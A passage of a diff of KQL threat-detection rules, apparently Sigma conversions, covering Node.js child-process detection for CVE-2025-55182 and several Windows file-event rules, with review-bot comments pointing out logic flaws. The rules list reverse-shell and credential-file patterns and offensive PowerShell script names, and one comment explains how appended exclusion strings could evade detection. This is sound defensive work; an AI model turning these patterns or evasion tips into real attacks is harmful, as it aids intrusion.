or ProcessCommandLine contains "cat " or ProcessCommandLine contains "curl" or ProcessCommandLine contains "dig" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains 
"IO::Socket::INET" or ProcessCommandLine contains "java" or ProcessCommandLine contains "less " or ProcessCommandLine contains "lua" or ProcessCommandLine contains "mkfifo " or ProcessCommandLine contains "more" or ProcessCommandLine contains "nc " or ProcessCommandLine contains "ncat" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "perl" or ProcessCommandLine contains "php" or ProcessCommandLine contains "ping" or ProcessCommandLine contains "ps -ef" or ProcessCommandLine contains "ps aux" or ProcessCommandLine contains "python" or ProcessCommandLine contains "rcat" or ProcessCommandLine contains "ruby" or ProcessCommandLine contains "sh -i 2>&1" or ProcessCommandLine contains "-c id" or ProcessCommandLine contains "socat" or ProcessCommandLine contains "uname" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "whoami") or ((FolderPath endswith "/busybox" or FolderPath endswith "/cat" or FolderPath endswith "/curl" or FolderPath endswith "/dash" or FolderPath endswith "/dig" or FolderPath endswith "/head" or FolderPath endswith "/id" or FolderPath endswith "/ifconfig" or FolderPath endswith "/ip" or FolderPath endswith "/java" or FolderPath endswith "/less" or FolderPath endswith "/lua" or FolderPath endswith "/more" or FolderPath endswith "/nc" or FolderPath endswith "/ncat" or FolderPath endswith "/netcat" or FolderPath endswith "/netstat" or FolderPath endswith "/nslookup" or FolderPath endswith "/perl" or FolderPath endswith "/ping" or FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/ruby" or FolderPath endswith "/socat" or FolderPath endswith "/tail" or FolderPath endswith "/wget" or FolderPath endswith "/whoami") or FolderPath contains "/python")) or (FolderPath endswith "/sh" and (not(FolderPath endswith "-c"))) or ((FolderPath endswith "-c" and FolderPath endswith "/sh") and 
(ProcessCommandLine contains "/dev/tcp/" or ProcessCommandLine contains "/dev/udp/" or ProcessCommandLine contains "/etc/hosts" or ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/shadow" or ProcessCommandLine contains "base64" or ProcessCommandLine contains "cat " or ProcessCommandLine contains "curl" or ProcessCommandLine contains "dig" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains "IO::Socket::INET" or ProcessCommandLine contains "java" or ProcessCommandLine contains "less " or ProcessCommandLine contains "lua" or ProcessCommandLine contains "mkfifo " or ProcessCommandLine contains "more" or ProcessCommandLine contains "nc " or ProcessCommandLine contains "ncat" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "perl" or ProcessCommandLine contains "php" or ProcessCommandLine contains "ping" or ProcessCommandLine contains "ps -ef" or ProcessCommandLine contains "ps aux" or ProcessCommandLine contains "python" or ProcessCommandLine contains "rcat" or ProcessCommandLine contains "ruby" or ProcessCommandLine contains "sh -i 2>&1" or ProcessCommandLine contains "-c id" or ProcessCommandLine contains "socat" or ProcessCommandLine contains "uname" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "whoami"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/windows_suspicious_child_process_from_node_js_react2shell.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/windows_suspicious_child_process_from_node_js_react2shell.kql new file mode 100644 index 00000000..9d3f7330 --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/windows_suspicious_child_process_from_node_js_react2shell.kql 
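Review bot: The shell branch at the tail of the `| where` is dead code: `FolderPath endswith "-c" and FolderPath endswith "/sh"` can never both hold, so the keyword-gated `sh -c` path never fires, and the preceding `FolderPath endswith "/sh" and (not(FolderPath endswith "-c"))` collapses to `FolderPath endswith "/sh"`, raising a high-level alert on every `sh` child of a matching node process regardless of what it runs. This looks like a Sigma-to-KQL field-mapping slip — the Windows sibling rule in this patch tests the shell flag on `ProcessCommandLine contains "/d /s /c "`, not on the image — so presumably both `-c` tests should read `ProcessCommandLine contains " -c "`; fix it in the converter or the upstream rule rather than by hand-editing this generated file. Separately, bare keywords such as `"java"`, `"lua"`, `"dig"` and `"more"` are unanchored substrings (`javascript`, `evaluate`, `digest`) and will be noisy under a Next.js dev server; the image list on the same line already anchors most of these with `FolderPath endswith`, which is the safer form.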
@@ -0,0 +1,13 @@ +// Title: Windows Suspicious Child Process from Node.js - React2Shell +// Author: Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali +// Date: 2025-12-05 +// Level: high +// Description: Detects suspicious child processes started by Node.js server processes on Windows, which may indicate exploitation of vulnerabilities like CVE-2025-55182 (React2Shell). +// Attackers can abuse the Node.js 'child_process' module to run system commands or scripts using methods such as spawn(), exec(), execFile(), fork(), or execSync(). +// If execSync() or exec() is used in the exploit, the command line often shows a shell (e.g., cmd.exe /d /s /c ...) running a suspicious command unless other shells are explicitly invoked. +// For other methods, the spawned process appears directly in the Image field unless a shell is explicitly used. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-55182 + +DeviceProcessEvents +| where ((InitiatingProcessCommandLine contains "--experimental-https" or InitiatingProcessCommandLine contains "--experimental-next-config-strip-types" or InitiatingProcessCommandLine contains "\\node_modules\\next" or InitiatingProcessCommandLine contains "next dev" or InitiatingProcessCommandLine contains "next start" or InitiatingProcessCommandLine contains "next\" start" or InitiatingProcessCommandLine contains "node_modules\\.bin\\\\..\\next" or InitiatingProcessCommandLine contains "react-scripts start" or InitiatingProcessCommandLine contains "start-server.js") and InitiatingProcessFolderPath endswith "\\node.exe") and (((ProcessCommandLine contains "\\net" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil " or ProcessCommandLine contains "conhost --headless" or ProcessCommandLine contains "cscript " or ProcessCommandLine contains "curl" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine 
contains "java" or ProcessCommandLine contains "lua" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "netsh" or ProcessCommandLine contains "nslookup " or ProcessCommandLine contains "perl" or ProcessCommandLine contains "ping " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "python" or ProcessCommandLine contains "reg " or ProcessCommandLine contains "reg.exe" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "ruby" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "sc.exe" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "wmic" or ProcessCommandLine contains "wscript") or ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\OpenConsole.exe" or FolderPath endswith "\\perl.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\py.exe" or FolderPath endswith "\\python.exe" or FolderPath endswith "\\pythonw.exe" or FolderPath endswith "\\pyw.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") or FolderPath 
contains "\\python")) or (FolderPath endswith "\\cmd.exe" and (not(ProcessCommandLine contains "/d /s /c "))) or ((ProcessCommandLine contains "/d /s /c " and FolderPath endswith "\\cmd.exe") and (not((ProcessCommandLine contains "git config --local --get remote.origin.url" or (ProcessCommandLine contains "\\mkcert\\" and ProcessCommandLine contains " -CAROOT") or (ProcessCommandLine contains "\\mkcert\\" and ProcessCommandLine contains " -install ") or (ProcessCommandLine contains "netstat -ano | findstr /C:" and ProcessCommandLine contains " | findstr LISTENING")))))) \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/gui_input_capture_macos.kql b/KQL/rules/macos/process_creation/gui_input_capture_macos.kql index 084037f2..4c4c9582 100644 --- a/KQL/rules/macos/process_creation/gui_input_capture_macos.kql +++ b/KQL/rules/macos/process_creation/gui_input_capture_macos.kql 
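Review bot: The false-positive exclusions on the `cmd.exe /d /s /c` branch are plain `contains` tests, so they are attacker-controllable: appending `& git config --local --get remote.origin.url` (or the `netstat -ano | findstr /C:` / `| findstr LISTENING` pair) to an `exec()` payload that avoids the keyword list suppresses the alert, because the keyword branch is the only other path and the exclusion is evaluated on the whole command line. Anchor each exclusion to the exact command line node builds, e.g. `ProcessCommandLine endswith "/d /s /c \"git config --local --get remote.origin.url\""` (presumably the real form — verify against a dev-server sample), and do the same for the mkcert and netstat cases. The same substring looseness affects `"java"`, `"lua"` and `"reg "` in the command-line keyword list (`javascript`, `evaluate`, `--reg `); since this file is converted from Sigma, the fix belongs in the upstream rule or the converter.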
@@ -9,4 +9,4 @@ // - Legitimate administration tools and activities DeviceProcessEvents -| where FolderPath =~ "/usr/sbin/osascript" and (ProcessCommandLine contains "-e" and ProcessCommandLine contains "display" and ProcessCommandLine contains "dialog" and ProcessCommandLine contains "answer") and (ProcessCommandLine contains "admin" or ProcessCommandLine contains "administrator" or ProcessCommandLine contains "authenticate" or ProcessCommandLine contains "authentication" or ProcessCommandLine contains "credentials" or ProcessCommandLine contains "pass" or ProcessCommandLine contains "password" or ProcessCommandLine contains "unlock") \ No newline at end of file +| where (ProcessCommandLine contains "-e" and ProcessCommandLine contains "display" and ProcessCommandLine contains "dialog" and ProcessCommandLine contains "answer") and (ProcessCommandLine contains "admin" or ProcessCommandLine contains "administrator" or ProcessCommandLine contains "authenticate" or ProcessCommandLine contains "authentication" or ProcessCommandLine contains "credentials" or ProcessCommandLine contains "pass" or ProcessCommandLine contains "password" or ProcessCommandLine contains "unlock") and FolderPath endswith "/osascript" \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql b/KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql index 3bec8773..783d94c9 100644 --- a/KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql +++ b/KQL/rules/windows/file/file_event/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql 
@@ -7,4 +7,4 @@ // Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 DeviceFileEvents -| where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file +| where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Windows\\UUS\\arm64\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/desktop_ini_created_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/desktop_ini_created_by_uncommon_process.kql new file mode 100644 index 00000000..d4c27717 --- /dev/null +++ b/KQL/rules/windows/file/file_event/desktop_ini_created_by_uncommon_process.kql 
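Review bot: The new `C:\\Windows\\UUS\\arm64\\` exclusion is architecture-specific while the sibling rule in this same patch excludes `C:\\Windows\\uus\\` as a whole; if the x64 update stack stages `wer.dll`/`WerFault.exe` under an `amd64` sibling folder this rule will keep firing there, so `FolderPath startswith "C:\\Windows\\UUS\\"` is probably what is wanted (confirm on an amd64 host). More importantly, the prefix exclusions `C:\\Windows\\System32\\` and `C:\\Windows\\SysWOW64\\` also cover user-writable subfolders (e.g. `System32\Tasks\`, `System32\spool\drivers\color\`), so a `WerFault.exe` or `wer.dll` dropped there for the T1574.001 side-load is silently excluded. For those two directories the legitimate file sits at a fixed path, so an exact list such as `not(FolderPath in~ ("C:\\Windows\\System32\\WerFault.exe", "C:\\Windows\\System32\\wer.dll", "C:\\Windows\\SysWOW64\\WerFault.exe", "C:\\Windows\\SysWOW64\\wer.dll"))` closes the gap while the prefix form can stay for SoftwareDistribution/WinSxS/UUS whose subfolders vary. As this file is generated from Sigma, raise it upstream rather than editing here.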
@@ -0,0 +1,13 @@ +// Title: Desktop.INI Created by Uncommon Process +// Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO) +// Date: 2020-03-19 +// Level: medium +// Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009 +// False Positives: +// - Operations performed through Windows SCCM or equivalent +// - Read only access list authority + +DeviceFileEvents +| where FolderPath endswith "\\desktop.ini" and (not(((InitiatingProcessFolderPath startswith "C:\\Windows\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\"))) and (not(((InitiatingProcessFolderPath endswith "\\AppData\\Local\\JetBrains\\Toolbox\\bin\\7z.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\" and FolderPath contains "\\JetBrains\\apps\\") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql b/KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql index 90c132a2..2867167c 100644 --- a/KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql +++ b/KQL/rules/windows/file/file_event/files_with_system_process_name_in_unsuspected_locations.kql 
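Review bot: The exclusion `InitiatingProcessFolderPath startswith "C:\\Windows\\"` carves out `cmd.exe`, `powershell.exe`, `attrib.exe` and every other LOLBin under `C:\Windows\System32\`, which is how a desktop.ini is typically planted for T1547.009, so as generated the rule only catches third-party or user-profile binaries writing the file. Consider replacing that prefix with an explicit allow-list of the system processes that legitimately write desktop.ini (e.g. `InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe")` — derive the full set from baseline data) while keeping the two `Program Files` prefixes. Also, the description says "accessing desktop.ini" but `DeviceFileEvents` only carries create/modify/rename/delete actions, so the rule sees writes, not reads, as the title already says; and the false-positive bullet "Read only access list authority" reads as garbled. Both wording fixes belong in the upstream Sigma rule since this file is converter output.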
@@ -11,4 +11,4 @@ // - Third party software naming their software with the same names as the processes mentioned here DeviceFileEvents -| where (FolderPath endswith "\\AtBroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\backgroundTaskHost.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmdl32.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dasHost.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventcreate.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\extrac32.exe" or FolderPath endswith "\\fontdrvhost.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\iscsicli.exe" or FolderPath endswith "\\iscsicpl.exe" or FolderPath endswith "\\logman.exe" or FolderPath endswith "\\LogonUI.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msinfo32.exe" or FolderPath endswith "\\mstsc.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regini.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchIndexer.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\SecurityHealthService.exe" or FolderPath endswith "\\SecurityHealthSystray.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\ShellAppRuntime.exe" or FolderPath 
endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\SystemSettingsBroker.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\TiWorker.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\w32tm.exe" or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WerFaultSecure.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winrshost.exe" or FolderPath endswith "\\WinRTNetMUAHostServer.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wlrmdr.exe" or FolderPath endswith "\\WmiPrvSE.exe" or FolderPath endswith "\\wslhost.exe" or FolderPath endswith "\\WSReset.exe" or FolderPath endswith "\\WUDFHost.exe" or FolderPath endswith "\\WWAHost.exe") and (not((FolderPath endswith "C:\\Windows\\explorer.exe" or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\") or (InitiatingProcessFolderPath endswith "\\SecurityHealthSetup.exe" and FolderPath contains "C:\\Windows\\System32\\SecurityHealth\\" and FolderPath endswith "\\SecurityHealthSystray.exe") or ((InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\msiexec.exe" or InitiatingProcessFolderPath endswith "C:\\WINDOWS\\SysWOW64\\msiexec.exe") and (FolderPath startswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or FolderPath 
startswith "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview\\")) or ((InitiatingProcessFolderPath endswith "C:\\Windows\\system32\\svchost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\svchost.exe") and (FolderPath contains "C:\\Program Files\\WindowsApps\\" or FolderPath contains "C:\\Program Files (x86)\\WindowsApps\\" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\")) or (InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\wuauclt.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\wuauclt.exe")))) \ No newline at end of file +| where (FolderPath endswith "\\AtBroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\backgroundTaskHost.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmdl32.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dasHost.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventcreate.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\extrac32.exe" or FolderPath endswith "\\fontdrvhost.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\iscsicli.exe" or FolderPath endswith "\\iscsicpl.exe" or FolderPath endswith "\\logman.exe" or FolderPath endswith "\\LogonUI.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msinfo32.exe" or FolderPath endswith "\\mstsc.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regini.exe" or FolderPath endswith "\\regsvr32.exe" or 
FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchIndexer.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\SecurityHealthService.exe" or FolderPath endswith "\\SecurityHealthSystray.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\ShellAppRuntime.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\SystemSettingsBroker.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\TiWorker.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\w32tm.exe" or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WerFaultSecure.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winrshost.exe" or FolderPath endswith "\\WinRTNetMUAHostServer.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wlrmdr.exe" or FolderPath endswith "\\WmiPrvSE.exe" or FolderPath endswith "\\wslhost.exe" or FolderPath endswith "\\WSReset.exe" or FolderPath endswith "\\WUDFHost.exe" or FolderPath endswith "\\WWAHost.exe") and (not((FolderPath endswith "C:\\Windows\\explorer.exe" or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\") or (InitiatingProcessFolderPath endswith 
"\\SecurityHealthSetup.exe" and FolderPath contains "C:\\Windows\\System32\\SecurityHealth\\" and FolderPath endswith "\\SecurityHealthSystray.exe") or ((InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\msiexec.exe" or InitiatingProcessFolderPath endswith "C:\\WINDOWS\\SysWOW64\\msiexec.exe") and (FolderPath startswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview\\")) or ((InitiatingProcessFolderPath endswith "C:\\Windows\\system32\\svchost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\SysWOW64\\svchost.exe") and (FolderPath contains "C:\\Program Files\\WindowsApps\\" or FolderPath contains "C:\\Program Files (x86)\\WindowsApps\\" or FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\")) or ((InitiatingProcessFolderPath endswith "\\TiWorker.exe" or InitiatingProcessFolderPath endswith "\\wuaucltcore.exe") and FolderPath startswith "C:\\Windows\\Temp\\") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\wuauclt.exe", "C:\\Windows\\SysWOW64\\wuauclt.exe", "C:\\Windows\\UUS\\arm64\\wuaucltcore.exe"))))) \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql b/KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql index 9b6c558c..4b9046be 100644 --- a/KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql +++ b/KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql 
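Review bot: The new exclusion `(InitiatingProcessFolderPath endswith "\\TiWorker.exe" or InitiatingProcessFolderPath endswith "\\wuaucltcore.exe") and FolderPath startswith "C:\\Windows\\Temp\\"` anchors only the parent's file name, so a process named `TiWorker.exe` running from anywhere (a user profile, a temp folder) can drop `lsass.exe`/`svchost.exe` look-alikes into `C:\Windows\Temp\` without firing — a gap in a rule whose whole purpose is catching masqueraded system-process names. Anchor the parent path too, e.g. `(InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\" and InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath startswith "C:\\Windows\\UUS\\" and InitiatingProcessFolderPath endswith "\\wuaucltcore.exe")` (presumably their real homes — the `in~` list on the same line already uses the full `C:\\Windows\\UUS\\arm64\\wuaucltcore.exe` path, so confirm against that). That `in~` list, like the werfault rule in this patch, names only the arm64 wuaucltcore; x64 hosts likely need the `amd64` entry as well. Since the file is converted from Sigma, the fix belongs upstream or in the converter.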
@@ -7,4 +7,4 @@ // Tags: attack.execution, attack.t1059.001 DeviceFileEvents -| where (FolderPath endswith "\\Add-ConstrainedDelegationBackdoor.ps1" or FolderPath endswith "\\Add-Exfiltration.ps1" or FolderPath endswith "\\Add-Persistence.ps1" or FolderPath endswith "\\Add-RegBackdoor.ps1" or FolderPath endswith "\\Add-RemoteRegBackdoor.ps1" or FolderPath endswith "\\Add-ScrnSaveBackdoor.ps1" or FolderPath endswith "\\ADRecon.ps1" or FolderPath endswith "\\AzureADRecon.ps1" or FolderPath endswith "\\BadSuccessor.ps1" or FolderPath endswith "\\Check-VM.ps1" or FolderPath endswith "\\ConvertTo-ROT13.ps1" or FolderPath endswith "\\Copy-VSS.ps1" or FolderPath endswith "\\Create-MultipleSessions.ps1" or FolderPath endswith "\\DNS_TXT_Pwnage.ps1" or FolderPath endswith "\\dnscat2.ps1" or FolderPath endswith "\\Do-Exfiltration.ps1" or FolderPath endswith "\\DomainPasswordSpray.ps1" or FolderPath endswith "\\Download_Execute.ps1" or FolderPath endswith "\\Download-Execute-PS.ps1" or FolderPath endswith "\\Enable-DuplicateToken.ps1" or FolderPath endswith "\\Enabled-DuplicateToken.ps1" or FolderPath endswith "\\Execute-Command-MSSQL.ps1" or FolderPath endswith "\\Execute-DNSTXT-Code.ps1" or FolderPath endswith "\\Execute-OnTime.ps1" or FolderPath endswith "\\ExetoText.ps1" or FolderPath endswith "\\Exploit-Jboss.ps1" or FolderPath endswith "\\Find-AVSignature.ps1" or FolderPath endswith "\\Find-Fruit.ps1" or FolderPath endswith "\\Find-GPOLocation.ps1" or FolderPath endswith "\\Find-TrustedDocuments.ps1" or FolderPath endswith "\\FireBuster.ps1" or FolderPath endswith "\\FireListener.ps1" or FolderPath endswith "\\Get-ApplicationHost.ps1" or FolderPath endswith "\\Get-ChromeDump.ps1" or FolderPath endswith "\\Get-ClipboardContents.ps1" or FolderPath endswith "\\Get-ComputerDetail.ps1" or FolderPath endswith "\\Get-FoxDump.ps1" or FolderPath endswith "\\Get-GPPAutologon.ps1" or FolderPath endswith "\\Get-GPPPassword.ps1" or FolderPath endswith "\\Get-IndexedItem.ps1" or 
FolderPath endswith "\\Get-Keystrokes.ps1" or FolderPath endswith "\\Get-LSASecret.ps1" or FolderPath endswith "\\Get-MicrophoneAudio.ps1" or FolderPath endswith "\\Get-PassHashes.ps1" or FolderPath endswith "\\Get-PassHints.ps1" or FolderPath endswith "\\Get-RegAlwaysInstallElevated.ps1" or FolderPath endswith "\\Get-RegAutoLogon.ps1" or FolderPath endswith "\\Get-RickAstley.ps1" or FolderPath endswith "\\Get-Screenshot.ps1" or FolderPath endswith "\\Get-SecurityPackages.ps1" or FolderPath endswith "\\Get-ServiceFilePermission.ps1" or FolderPath endswith "\\Get-ServicePermission.ps1" or FolderPath endswith "\\Get-ServiceUnquoted.ps1" or FolderPath endswith "\\Get-SiteListPassword.ps1" or FolderPath endswith "\\Get-System.ps1" or FolderPath endswith "\\Get-TimedScreenshot.ps1" or FolderPath endswith "\\Get-UnattendedInstallFile.ps1" or FolderPath endswith "\\Get-Unconstrained.ps1" or FolderPath endswith "\\Get-USBKeystrokes.ps1" or FolderPath endswith "\\Get-VaultCredential.ps1" or FolderPath endswith "\\Get-VulnAutoRun.ps1" or FolderPath endswith "\\Get-VulnSchTask.ps1" or FolderPath endswith "\\Get-WebConfig.ps1" or FolderPath endswith "\\Get-WebCredentials.ps1" or FolderPath endswith "\\Get-WLAN-Keys.ps1" or FolderPath endswith "\\Gupt-Backdoor.ps1" or FolderPath endswith "\\HTTP-Backdoor.ps1" or FolderPath endswith "\\HTTP-Login.ps1" or FolderPath endswith 